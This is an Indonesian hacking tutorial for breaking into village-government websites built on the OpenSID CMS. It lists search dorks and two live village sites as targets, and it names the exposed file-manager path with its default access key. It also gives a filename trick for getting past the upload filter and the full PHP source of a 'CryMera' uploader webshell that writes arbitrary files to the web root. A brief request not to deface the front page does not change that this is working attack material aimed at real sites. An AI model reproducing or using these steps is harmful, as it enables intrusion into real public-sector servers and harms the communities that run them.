Dork: "OpenSID Tangerang"
"OpenSID Bandung"
"Desa SID site:"
Exploit: /assets/filemanager/dialog.php?akey=GantiKunciDesa
Dorking Dulu Lah Kalianya
Nih Live Target :
http://kalidengen-kulonprogo.desa.id
http://pantaigading.opendesa.id/
Tambahkan Exploitnya.....
Terus ntar ada tuh Rfm atau Responsif FileManager
Kalian Upload Mini Shell / Uploader Kalian Kalau bisa Rename Jadi format.txt misalnya (shell.php<?.txt) nah itu ntar itu pasti langsung berubah jadi format php...txtnya dah keinject ama <?
Nih Comot Mini Uploader Buat Up Shell
//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //<title>./CryMera - FR13NDS CYBER ARMY </title><center>
<body bgcolor="black">
<br><br><br><br>
<br>
<font color="lime" size="5">> ./CryMera <</font>
<font color="red"></center><br><br>
<center>
<?php
echo "FR13NDS CYBER ARMY - Home Root Uploader<br>";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='Upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Sukses Cok! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "Gagal Upload Di Document Root.";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Sukses Upload <b>$files</b> Di Folder Ini";
} else {
echo "Gagal mek!";
}
}
}
?>
Ingat Save dengan format Shell.php<?.txt
Cara akses File yang telah Kalian Upload
/desa/upload/media/file.php / html kalian
Di Sarankan Webnya Jangan Di Tebas Ya cok Kasian...Kalian Bisa Baca Di Sini https://blog.linuxploit.com/2020/06/stop-mengusili-web-desa-yang-memakai-cms-opensid.html alasan Jangan Di tebas index :) Jadilah Defacer Yang Baik....tapi kalau kelen blackhat sejati...ya serterah kalian
Masih Ragu Dengan Tutornya??
Lihat Videonya di Sini
Komentar
Kalo kalian mau lapor bug
Bisa kunjungi grup facebook
Forum Pengguna dan pegiat opensid
Stop Mengusili web desa yang memakai opensid.
https://blog.linuxploit.com/2020/06/stop-mengusili-web-desa-yang-memakai-cms-opensid.html